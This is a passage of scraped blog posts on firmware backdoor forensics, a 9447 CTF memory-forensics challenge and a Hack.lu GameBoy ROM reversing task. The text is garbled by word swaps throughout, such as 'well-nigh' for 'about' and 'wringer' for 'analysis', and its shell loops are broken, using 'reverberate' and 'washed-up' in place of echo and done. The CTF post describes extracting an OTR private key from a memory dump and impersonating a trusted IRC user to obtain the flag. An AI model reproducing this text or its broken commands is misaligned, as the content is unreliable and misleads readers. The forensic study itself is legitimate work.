key&nbsp;NCNdeadb6adec4c77a40c23e04770924d3c5b18face.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-J3BLu5nzoiU/VNGWaKt1TmI/AAAAAAAAA1g/EMriC_TrL-c/s1600/flag.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://2.bp.blogspot.com/-J3BLu5nzoiU/VNGWaKt1TmI/AAAAAAAAA1g/EMriC_TrL-c/s1600/flag.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div>This was just too easy right? But what if we didn't have a known template for comparison?<br /><br /><b><br /></b><b>Timeline Analysis</b><br /><b><br /></b>My tool of nomination to perform timeline wringer is <a href="http://plaso.kiddaland.net/">Plaso</a>, created by&nbsp;<a href="https://twitter.com/el_killerdwarf">@el_killerdwarf</a>. The tool is python-based, modular and very fast. What I like most well-nigh it is the ease to output results to <a href="http://www.elasticsearch.org/overview/elkdownloads/">ELK</a>. If you don't know well-nigh Plaso and the ELK stack, read this <a href="http://blog.kiddaland.net/2013/11/visualize-output.html">quick tutorial</a>&nbsp;and <a href="http://plaso.kiddaland.net/developer/building-the-tool/linux">set up your environment</a>.<br /><br />Let's use <a href="http://plaso.kiddaland.net/usage/log2timeline">log2timeline</a>&nbsp;to create a dump file, pointing to the extracted SquashFS path:<br /><br /><div class="code">log2timeline.py output.dump squashfs-root/</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-uOj5n0gzNQo/VNQquHmXOZI/AAAAAAAAA2E/z9oFPiuL8gM/s1600/Screenshot-Terminal-8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="263" src="http://4.bp.blogspot.com/-uOj5n0gzNQo/VNQquHmXOZI/AAAAAAAAA2E/z9oFPiuL8gM/s1600/Screenshot-Terminal-8.png" width="400" /></a></div><br />Let's fire up psort and include data in the timeline:<br /><br /><div class="code">psort.py -o rubberband output.dump</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-d8ot3TRL1TM/VNQqyGXbGNI/AAAAAAAAA2M/EWsKW1Ga0ig/s1600/Screenshot-Terminal-9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="263" src="http://3.bp.blogspot.com/-d8ot3TRL1TM/VNQqyGXbGNI/AAAAAAAAA2M/EWsKW1Ga0ig/s1600/Screenshot-Terminal-9.png" width="400" /></a></div><br />That's all, Plaso uses the <a href="https://github.com/log2timeline/plaso/blob/master/plaso/parsers/filestat.py">filestat</a> parser to pericope metadata from the files, outputting results to Elasticsearch.<br /><br />We once identified the pursuit dates from the firmware:<br /><br /><ul><li>03 February 2007 (??:??:??): BinHeader firmware megacosm date</li><li>03 February 2007 (13:16:08): Linux Kernel compile date</li><li>29 October &nbsp;2014 (16:53:25): SquashFS megacosm or last suspend time</li></ul><br />First let's filter the filesystem attributes: we just want to exhibit the mtime (modified) timestamp, so we are going to perform a micro wringer to include the value. The filter should be something like this: field must | field timestamp_desc | query: "mtime".<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-88Wi4gS4Ckk/VNQsRTSt3iI/AAAAAAAAA2Y/sdpAc4_SRjQ/s1600/Screenshot-Kibana%2B3%2B-%2BPlaso%2B-%2BMozilla%2BFirefox.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="http://2.bp.blogspot.com/-88Wi4gS4Ckk/VNQsRTSt3iI/AAAAAAAAA2Y/sdpAc4_SRjQ/s1600/Screenshot-Kibana%2B3%2B-%2BPlaso%2B-%2BMozilla%2BFirefox.png" width="640" /></a></div><br />The histogram view is very helpful to get a big picture of what's going on:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-eOjg7Y4IXFw/VNQsahsFKRI/AAAAAAAAA2g/SK_LeRqSBHk/s1600/Screenshot-Kibana%2B3%2B-%2BPlaso%2B-%2BMozilla%2BFirefox-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="478" src="http://1.bp.blogspot.com/-eOjg7Y4IXFw/VNQsahsFKRI/AAAAAAAAA2g/SK_LeRqSBHk/s1600/Screenshot-Kibana%2B3%2B-%2BPlaso%2B-%2BMozilla%2BFirefox-2.png" width="640" /></a></div><br />We can unmistakably see that the files included/modified on 2014-10-29 had a malicious nature. The <strike>state sponsored</strike> attacker did not modify other files from the OpenWRT wiring image.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-0SOvG5dP_qQ/VNQsxqjxzpI/AAAAAAAAA2o/25VqJ8e8qBo/s1600/Screenshot-Kibana%2B3%2B-%2BPlaso%2B-%2BMozilla%2BFirefox-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="366" src="http://2.bp.blogspot.com/-0SOvG5dP_qQ/VNQsxqjxzpI/AAAAAAAAA2o/25VqJ8e8qBo/s1600/Screenshot-Kibana%2B3%2B-%2BPlaso%2B-%2BMozilla%2BFirefox-1.png" width="640" /></a></div><br />At this point it is pretty well-spoken that the firmware was modified using the <a href="https://downloads.openwrt.org/whiterussian/0.9/">OpenWRT Image Builder</a>, which is a pre-compiled OpenWrt build environment. The BinHeader and the Kernel timestamps were left untouched and the only partition modified was the SquashFS one.<br /><br />Of undertow these timestamps, like any kind of metadata, could be tampered by the malicious hacker. However, they are very helpful during the initial phases, speeding up investigations and narrowing the wringer to a smaller set of data.<br /><br /><b><br /></b><b>ELF Structural Information</b><br /><br />I unchangingly get impressed when AV vendors <a href="http://securelist.com/blog/research/67741/regin-nation-state-ownage-of-gsm-networks/">manage to profile APT and State-sponsored attackers</a>&nbsp;based on PE timestamps. Techniques like the&nbsp;<a href="https://www.mandiant.com/blog/tracking-malware-import-hashing/">imphash</a> are often used exclusively on Windows.<br /><br />PE Imports are the functions that a piece of software calls from other files (typically DLLs). To track these imports, a hash is created based on library/API names and their specific order within the executable.Consideringof the way a PE’s import table is generated, we can use the imphash value to identify related malware samples, for example.<br /><br />Everybody does that for Windows binaries but what well-nigh Linux? Virustotal recently <a href="http://blog.virustotal.com/2014/11/virustotal-detailed-elf-information.html">included detailed ELF information on their engine</a>. We can moreover use these sections to identify useful information from the binaries, including the toolchain used to compile them.<br /><br />We often don't have any timestamp information on the ELF section, but there are many other interesting fields. This <a href="http://reverse.lostrealm.com/protect/strip.html">quick guide on using strip</a>&nbsp;summarizes some topics:<br /><br /><blockquote class="tr_bq"><span style="font-family: Arial, Helvetica, sans-serif;"><i>When an executable is produced from source code, there are two stages - compilation and linking. Compiling takes a source file and produces an object file. Linking concatenates these object files into a single executable. The concatenation occurs by section. For example, the .comment section for the final executable will contain the contents of the .comment section of each object file that was linked into the executable.</i></span></blockquote><blockquote class="tr_bq"><span style="font-family: Arial, Helvetica, sans-serif;"><i>If we examine the contents of the .comment section we can see the compiler used, plus the version of the compiler</i></span></blockquote>It's pretty simple to read and parse the .comment sections from ELF files. <a href="https://www.gnu.org/software/binutils/">GNU readelf</a>&nbsp;(part of binutils) and <a href="https://github.com/eliben/pyelftools">pyelftools</a>&nbsp;include all the necessary functions parse them. <br /><br />I unchangingly try to exhibit information from object files using variegated toolchains in order to find out which one understands the file structure properly. On this specific case, I'm going to use mipsel-linux-gnu-readelf (part of <a href="http://www.emdebian.org/">Emdebian</a> toolchain), but the regular readelf moreover does the job.<br /><br /><div class="code">for i in $(find .) ; do reverberate $i ; mipsel-linux-gnu-readelf -p .comment $i ; washed-up &gt; comment-section.txt</div><div class="code">./lib/modules/2.4.30/diag.o<br /><br />String dump of section '.comment':<br />&nbsp; [ &nbsp; &nbsp; 1] &nbsp;GCC: (GNU) 3.4.4 (OpenWrt-1.0)<br /><br />./lib/modules/2.4.30/switch-adm.o<br /><br />String dump of section '.comment':<br />&nbsp; [ &nbsp; &nbsp; 1] &nbsp;GCC: (GNU) 3.4.4 (OpenWrt-1.0)<br /><br />./lib/modules/2.4.30/switch-robo.o<br /><br />String dump of section '.comment':<br />&nbsp; [ &nbsp; &nbsp; 1] &nbsp;GCC: (GNU) 3.4.4 (OpenWrt-1.0)<br /><br />./lib/modules/2.4.30/switch-core.o<br /><br />String dump of section '.comment':<br />&nbsp; [ &nbsp; &nbsp; 1] &nbsp;GCC: (GNU) 3.4.4 (OpenWrt-1.0)<br /><br />./lib/modules/2.4.30/wlcompat.o<br /><br />String dump of section '.comment':<br />&nbsp; [ &nbsp; &nbsp; 1] &nbsp;GCC: (GNU) 3.4.4 (OpenWrt-1.0)</div><br />Just a few ELF files included the scuttlebutt section, others got stripped during the compilation/linking phase. If we download OpenWRT 0.9 <a href="https://downloads.openwrt.org/whiterussian/0.9/whiterussian-0.9.tar.bz2">sources</a>&nbsp;we can see that GCC 3.4.4 was indeed used:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-ue50lktTw2s/VNZN60HuOfI/AAAAAAAAA3k/9NcdteuTQAw/s1600/gcc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="150" src="http://2.bp.blogspot.com/-ue50lktTw2s/VNZN60HuOfI/AAAAAAAAA3k/9NcdteuTQAw/s1600/gcc.png" width="400" /></a></div><br /><a href="http://w00tsec.blogspot.com.br/2014/02/analyzing-malware-for-embedded-devices.html">TheMoon Worm</a>&nbsp;exploited a writ injection to infect Linksys wireless routers with a self-replicating malware. If we unriddle its .comment section, we can see that it was probably compiled and linked using GCC 4.2.4 and 3.3.2. If we search for a .comment section on the router&nbsp;E4200,&nbsp;targeted by the worm, we can't find any reference considering the toolchain stripped all of them. Having a file compiled with a variegated toolchain or containing uneaten ELF sections (that others files don't) is something highly suspicious.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-T0G9-ifRWmw/VNd98TFG5YI/AAAAAAAAA4E/CzLGZOxrnF8/s1600/moon.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="108" src="http://1.bp.blogspot.com/-T0G9-ifRWmw/VNd98TFG5YI/AAAAAAAAA4E/CzLGZOxrnF8/s1600/moon.png" width="400" /></a></div><br />The .comment section for the final executable includes the contents of the .comment section of each object file that was linked into the executable. If we compare the scuttlebutt section on&nbsp;<a href="http://www.asus.com/us/Networking/RTAC87U/HelpDesk_Download/">ASUS RT-AC87U</a>&nbsp;Firmwares v3.0.0.4.378.3885 and v3.0.0.4.376.2769, we can spot an uneaten line on the newer version from tfat.ko:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-luhq_oW7CO8/VNa_7COIYyI/AAAAAAAAA30/XAATpwbulzk/s1600/compare.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="345" src="http://2.bp.blogspot.com/-luhq_oW7CO8/VNa_7COIYyI/AAAAAAAAA30/XAATpwbulzk/s1600/compare.png" width="640" /></a></div><br />If you want to dump all sections from the ELF file you may use this writ line (kind of hacky, but works):<br /><br /><div class="code">for i in $(find .) ; do reverberate "$i" ; for j in $(readelf -S "$i" | grep \\[ | cut -d"]" -f2 | cut -d " " -f2 | grep -v "Name") ; do mipsel-linux-gnu-readelf -p "$j" "$i" ; washed-up ; washed-up &gt; list.txt</div><br />The output will be a bit too verbose, you may want to narrow the wringer to the pursuit sections:<br /><br /><ul><li>.comment - contains version tenancy information</li><li>.modinfo - displays information from a kernel module</li><li>.notes -&nbsp;comments put there by the compiler/linker toolchain</li><li>.debug - contains information for symbol debugging</li><li>.interp - contains the name of the dynamic loader</li></ul><br />For increasingly information regarding the ELF file structure, trammels the <a href="http://man7.org/linux/man-pages/man5/elf.5.html">ELF man</a>&nbsp;and the Chapter 5 from&nbsp;<a href="http://www.amazon.com/Malware-Forensics-Field-Guide-Systems/dp/1597494704/">Malware Forensics Field Guide for Linux Systems</a>.<br /><br /><br /><b>Conclusion</b><br /><br />Without remoter clues or context these information may not be relevant, but in conjunction with other data they're helpful to get a big picture of what's going on:<br /><br /><ul><li>Diffing the content from previous firmwares may be useful to find out when backdoors were first installed, modified and/or removed.</li></ul><br /><ul><li>Artifact timeline megacosm and wringer moreover helps to speed up investigations by correlating the vast value of information found on system.</li></ul><br /><ul><li>The contents from the ELF section will likely reveal the toolchain and the compiler version used to compile a suspect executable. Clues such as this are attribution identifiers, contributing towards identifying the platform used by the attacker to craft his code.</li></ul><br />We can use the timestamps from the kernel partition to correlate variegated firmwares from the same family, for example. We can moreover compare the timestamps from each partition to find deviations: a firmware header created on 2007, with a Kernel timestamp from 2007 and a SquashFS partition dated to 2014 is highly suspicious.<br /><br />The&nbsp;<a href="http://firmware.re/">Firmware.RE</a>&nbsp;project is performing a large scale analysis, providing a largest understanding of the security issues related to firmwares. A broader view on firmwares is not only beneficial, but necessary to discover new vulnerabilities and backdoors, correlating different&nbsp;device families and showing how vulnerabilities reappear wideness variegated products. This is a really tomfool project to track how firmwares are evolving and getting security fixes.<br /><i><br /></i><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://twitter.com/vendorexcuses/status/550350987102552064"><img border="0" height="178" src="http://3.bp.blogspot.com/-ur0HSoXiBcE/VNff-8DqvQI/AAAAAAAAA4w/r299fVTRR0w/s1600/tweet2.png" width="400" /></a><span id="goog_1123768601"></span><span id="goog_1123768602"></span><a href="https://www.blogger.com/"></a></div><br />Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com4tag:blogger.com,1999:blog-3296471108082693838.post-39378636243408732342014-11-30T21:02:00.001-02:002014-12-04T20:47:07.160-02:009447 2014 CTF Write Up: coor coor<div>The Australian&nbsp;<a href="https://9447.plumbing/home">9447 Security Society CTF</a>&nbsp;took place on November 29-30 and it was yet flipside fun and really professionally organized CTF. I played with my friends from&nbsp;<a href="https://ctftime.org/team/10288">TheGoonies</a>&nbsp;once then (<a href="https://www.youtube.com/watch?v=hM5cj8OZZhk">The Goonies 'R' Good Enough</a>, right?).</div><br />I found the task "coor coor" particularly interesting: it was a good way to practice some concepts from the new typesetting I recently bought:&nbsp;<a href="http://www.amazon.com/Art-Memory-Forensics-Detecting-Malware/dp/1118825098/">The Art of Memory Forensics</a>&nbsp;(authored by&nbsp;<a href="https://twitter.com/attrc">@attrc</a>&nbsp;and <a href="https://twitter.com/gleeda">@gleeda</a>).<br /><br /><b>Task: coor coor (misc - 400)</b><br /><br /><div class="code">A 9447 CTF organizer is giving yonder flags to friends that he trusts. This memory dump was taken off a competitor's computer without a raid by the pwnpolice. </div><br />Download provided:&nbsp;<a href="https://s3-us-west-2.amazonaws.com/elasticbeanstalk-us-west-2-467703568171/challenges/coorcoor.tar.bz2">https://s3-us-west-2.amazonaws.com/elasticbeanstalk-us-west-2-467703568171/challenges/coorcoor.tar.bz2</a><br /><br />Let's start by identifying the Operating System profile:<br /><div class="code">python vol.py -f challenge.vmem imageinfo</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-BjDCXQEPw8U/VHuGqU41qiI/AAAAAAAAAvI/imoT3YXhNi8/s1600/Screenshot-Terminal.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-BjDCXQEPw8U/VHuGqU41qiI/AAAAAAAAAvI/imoT3YXhNi8/s1600/Screenshot-Terminal.png" height="222" width="400" /></a></div><br />Let's take screenshot to see what the user was doing:<br /><div class="code">python vol.py -f challenge.vmem screenshot -D screenshot/</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-Kc3tz5eQYn8/VHuHZUt-GUI/AAAAAAAAAvQ/LGFfmjrXN3U/s1600/session_0.WinSta0.Default.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-Kc3tz5eQYn8/VHuHZUt-GUI/AAAAAAAAAvQ/LGFfmjrXN3U/s1600/session_0.WinSta0.Default.png" height="182" width="320" /></a></div><br />The user was running something inside VirtualBox, let's alimony digging:<br /><div class="code">python vol.py -f challenge.vmem psxview</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-c5-t4zuqR8E/VHuJieO2q5I/AAAAAAAAAvc/h8K-9fjt0EY/s1600/Screenshot-Terminal-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-c5-t4zuqR8E/VHuJieO2q5I/AAAAAAAAAvc/h8K-9fjt0EY/s1600/Screenshot-Terminal-1.png" height="320" width="280" /></a></div><div class="code">python vol.py -f challenge.vmem filescan | grep -e "\.tc\|TrueCrypt"</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-s-x-h0m7aG8/VHuLJb3DhaI/AAAAAAAAAvs/4oOFiA6LrbA/s1600/xaaa.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-s-x-h0m7aG8/VHuLJb3DhaI/AAAAAAAAAvs/4oOFiA6LrbA/s1600/xaaa.png" height="241" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div>The user was basically running a VirtualBox machine (business2.vdi) from an Encrypted TrueCrypt container (secret.tc). That's why we used psxview to list the system processes before. Note that the lower offsets are used by the Host and the higher ones (after 0x7b760da0) are used by the guest OS. So what was he doing?<br /><br /><div class="code">python vol.py -f challenge.vmem connscan</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-eRRc_yCUf4E/VHuMpSP7LVI/AAAAAAAAAv4/cnQ_edx2bFU/s1600/Screenshot-Terminal-4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-eRRc_yCUf4E/VHuMpSP7LVI/AAAAAAAAAv4/cnQ_edx2bFU/s1600/Screenshot-Terminal-4.png" height="81" width="400" /></a></div><br />The host 54.149.24.114 (yodawg.9447.plumbing) happened to be an IRC server with only one zippy channel: #9447ctf. We can whittle some pidgin logs using foremost:<br /><br /><div class="code">python vol.py -f challenge.vmem mftparser | grep 9447ctf</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-81D-io6GGDs/VHuO5LWFBMI/AAAAAAAAAwM/olsXRTCFVxg/s1600/Screenshot-Terminal-5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-81D-io6GGDs/VHuO5LWFBMI/AAAAAAAAAwM/olsXRTCFVxg/s1600/Screenshot-Terminal-5.png" height="165" width="400" /></a></div><div class="code">foremost challenge.vmem</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-gsDBAVKK6lI/VHuOtkoDlbI/AAAAAAAAAwE/TgFJwBIhz8Y/s1600/carve.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-gsDBAVKK6lI/VHuOtkoDlbI/AAAAAAAAAwE/TgFJwBIhz8Y/s1600/carve.png" height="160" width="400" /></a></div><br />Private conversations are not logged by default on Pidgin with the OTR extension. We can see a couple of OTR encrypted &nbsp;messages on the memory dump:<br /><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-qCvvUDzx7ps/VHuTXUQvxNI/AAAAAAAAAwY/Y9jb0oTfjCA/s1600/hex2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-qCvvUDzx7ps/VHuTXUQvxNI/AAAAAAAAAwY/Y9jb0oTfjCA/s1600/hex2.PNG" height="48" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-ehjpPb9MjKE/VHuTc1FxcpI/AAAAAAAAAwg/TUY4RBiXzuA/s1600/hex1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-ehjpPb9MjKE/VHuTc1FxcpI/AAAAAAAAAwg/TUY4RBiXzuA/s1600/hex1.PNG" height="121" width="400" /></a></div><br />Because of <a href="https://en.wikipedia.org/wiki/Forward_secrecy">Perfect Forward Secrecy</a>, if you lose tenancy of your private keys, no previous conversation is compromised. I just had the long term signature keys (<a href="https://gist.github.com/bmaia/a7a2b6e73cd0d9332738">otr.private_key</a>) and these aren't unquestionably used to encrypt conversations, just to sign the session encryption key. I still needed to retrieve the short term encryption keys from the memory. I got stuck on this phase and spent the whole night trying to icon how to do that.<br /><br />After some time I decided to get some sleep and alimony trying it on the pursuit day. The first thing I did the next day was to re-read the rencontre unravelment and I quickly figured it out:<br /><blockquote class="tr_bq"><i>"A 9447 CTF organizer is giving yonder flags to <u>friends that he trusts."</u></i></blockquote>Because of the way IRC works, I could hands impersonate testicool69 (the trusted frind), connect to the IRC server (yodawg.9447.plumbing:6667) and message acidburn88 (the CTF Admin) asking for the key. So how do I do that?<br /><br />Pidgin-OTR creates three files during an encrypted communication:&nbsp;otr.private_key,&nbsp;otr.instance_tags and&nbsp;otr.fingerprints. I searched for the term "prpl-irc" on the memory dump, extracted and replaced those files on my own Pidgin installation (%APPDATA%\.purple). There's a&nbsp;<a href="https://github.com/rapid7/metasploit-framework/blob/master/modules/post/multi/gather/pidgin_cred.rb">Metasploit post-module</a>&nbsp;to retrieve these keys from a live (hacked) system, by the way...<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-NjB_-DWo6c0/VHuVw4sZBaI/AAAAAAAAAws/AVgNG52VpiE/s1600/cript0.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-NjB_-DWo6c0/VHuVw4sZBaI/AAAAAAAAAws/AVgNG52VpiE/s1600/cript0.PNG" height="138" width="400" /></a></div><br /><script src="https://gist.github.com/bmaia/a7a2b6e73cd0d9332738.js"></script><br />I managed to forge his fingerprint&nbsp;using the stolen private key and got the secret Flag:<br /><br /><div style="text-align: center;"><b>9447{forensics_champ!}</b></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-d3TBUnFx5mM/VHuZNYQ4zgI/AAAAAAAAAxA/FPDHHcxxz6k/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-d3TBUnFx5mM/VHuZNYQ4zgI/AAAAAAAAAxA/FPDHHcxxz6k/s1600/1.PNG" height="265" width="400" /></a></div><br />Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com1tag:blogger.com,1999:blog-3296471108082693838.post-77465316711940236122014-10-24T03:34:00.001-02:002014-10-24T03:50:16.559-02:00Hack.lu 2014 CTF Write Up: At Gunpoint<a href="http://2014.hack.lu/index.php/CaptureTheFlag">Hack.lu's 2014 CTF</a> took place on October 21-23. The event was organized by&nbsp;<a href="https://twitter.com/fluxfingers">fluxfingers</a>, and this year's&nbsp;challenges were really enjoyable, huge props to them. I played with my friends from TheGoonies - without winning the Brazilian CTF&nbsp;<a href="http://ctf.tecland.com.br/Pwn2Win/game/scoreboard/">Pwn2Win</a>&nbsp;we are now getting largest organized to wilt increasingly competitive. There are quite a few write ups virtually and I decided to post well-nigh a few tasks which we had a variegated solution from other teams.<br /><br /><b>Task:&nbsp;At Gunpoint (Reversing - 200)</b><br /><br /><div class="code">You're the sheriff of a small town, investigating news well-nigh a gangster squad passing by. Rumor has it they're easy to outsmart, so you have just followed one to their encampment by the river. You know you can hands take them out one by one, if you would just know their secret handshake. </div><br />Download provided:&nbsp;<a href="https://wildwildweb.fluxfingers.net/static/chals/gunpoint_2daf5fe3fb236b398ff9e5705a058a7f.dat">gunpoint_2daf5fe3fb236b398ff9e5705a058a7f.dat</a><br /><br />File utility showed us that it was a GameBoy ROM. Having formerPanelHackers on the team came handy during this rencontre as we once knew in whop which tools to use&nbsp;and what to squint for.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-ULb2LO-OgXE/VEnGAsma4NI/AAAAAAAAAn8/QtnmwkzE1zQ/s1600/file1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-ULb2LO-OgXE/VEnGAsma4NI/AAAAAAAAAn8/QtnmwkzE1zQ/s1600/file1.png" height="55" width="400" /></a></div><br />We used <strike>TLayer</strike> <a href="http://www.romhacking.net/utilities/109/">TileMolester</a> from the legendary <a href="http://wiki.nesdev.com/w/index.php/Projects#stuff_by_SnowBro">SnowBro</a>&nbsp;to gather information well-nigh the graphics and the font data. Firstly, we switched the Codec to 1bpp and found the font used by the game.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-o64rgaew5aQ/VEnGLgBynrI/AAAAAAAAAoE/iEft2kZ8YA4/s1600/tlayer.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-o64rgaew5aQ/VEnGLgBynrI/AAAAAAAAAoE/iEft2kZ8YA4/s1600/tlayer.png" height="297" width="320" /></a></div><br />We were well-nigh to create a weft table when, without switching the Codec to 2bpp planar (GameBoy's native Codec), we found something interesting:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-JoALAZSAgyI/VEnGLgBxsqI/AAAAAAAAAoM/VsH3ygXBLPw/s1600/tlayer2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-JoALAZSAgyI/VEnGLgBxsqI/AAAAAAAAAoM/VsH3ygXBLPw/s1600/tlayer2.png" height="313" width="320" /></a></div><br />After some offset welding (using +, -, Shift + left and Shift + right) we got this image:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-8dGAkPPxYYk/VEnGL-5TSoI/AAAAAAAAAoI/lUjCvzBtvkE/s1600/tlayer3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-8dGAkPPxYYk/VEnGL-5TSoI/AAAAAAAAAoI/lUjCvzBtvkE/s1600/tlayer3.png" height="146" width="320" /></a></div><br />We submitted the key "tkCXDtheQDNRN", but it wasn't accepted. I wanted to personize that those tiles were tending in a linear way, so I kept analyzing the ROM.<br /><br />The GameBoy's screen has a resolution of 20x18 tiles. In order to trammels if the order of the tiles (and the flag) was correct, I performed a relative search using&nbsp;<a href="https://code.google.com/p/ricardojricken/">Darkl0rd's Monkey-Moore</a>:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-ZBPI2viaUZU/VEnMRGHIxrI/AAAAAAAAAos/kvbwAHuwAfA/s1600/moore.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-ZBPI2viaUZU/VEnMRGHIxrI/AAAAAAAAAos/kvbwAHuwAfA/s1600/moore.PNG" height="297" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div>Let's imagine a grid containing the tiles for the key "tkCXDtheQDNRN" sequentially. Considering the first tile as an A, the second one would be B, the third one C and so on.Without20 bytes (the screen width) there should be something like a line break: that's why I performed a relative search for ABCDEFGHIJKLMNOPQRST*UVWXYZ.<br /><br />If we go to the ROM's offset 0x0965 using an Hex Editor, we find out that this is indeed the section responsible for displaying the tiles:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-Ufjo_9E7NbY/VEnRhMZGETI/AAAAAAAAAo8/tNMvvqlrJfY/s1600/hex.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-Ufjo_9E7NbY/VEnRhMZGETI/AAAAAAAAAo8/tNMvvqlrJfY/s1600/hex.PNG" height="296" width="640" /></a></div><br />Let's compare it with the emulator's BGMAP when displaying the key:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-aCN_M2uh5Cw/VEnR3rdRYfI/AAAAAAAAApE/EGu-IjMtzUk/s1600/hexview.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-aCN_M2uh5Cw/VEnR3rdRYfI/AAAAAAAAApE/EGu-IjMtzUk/s1600/hexview.PNG" height="114" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-rtz7KRgKL6Q/VEnSAORJghI/AAAAAAAAApM/bGO7PCtKz_U/s1600/bug.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-rtz7KRgKL6Q/VEnSAORJghI/AAAAAAAAApM/bGO7PCtKz_U/s1600/bug.PNG" height="303" width="400" /></a></div><br />I'm not sure if this was intentional, but there's something strange on this key exhibit screen. The first tile for the char "t" (0x15) is followed by the first tile from "k" (0x16), which is followed by the first tile from "C" (0x17) until we reach the "N" (0x28). There's a unravel at offset 0x0979 (0x00) and the second half for these tiles (0x29 0x30 0x31 ... 0x3C) ends with a 0x3D instead of the usual 0x00. We can see this unmistakably on the screenshot above, as the tile highlighted by the mouse pointer (0x3D) is off the limits.<br /><br />Anyway, we theoretically had the correct flag but we took some time to icon out that the 6th letter was a "J" and not a "t". One member from our team figured that out and submitted the correct key "tkCXDJheQDNRN".<br /><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-Uta0M4Ybd1c/VEnja48LkwI/AAAAAAAAAqA/D_MpotX6rnk/s1600/w00t.PNG" imageanchor="1" 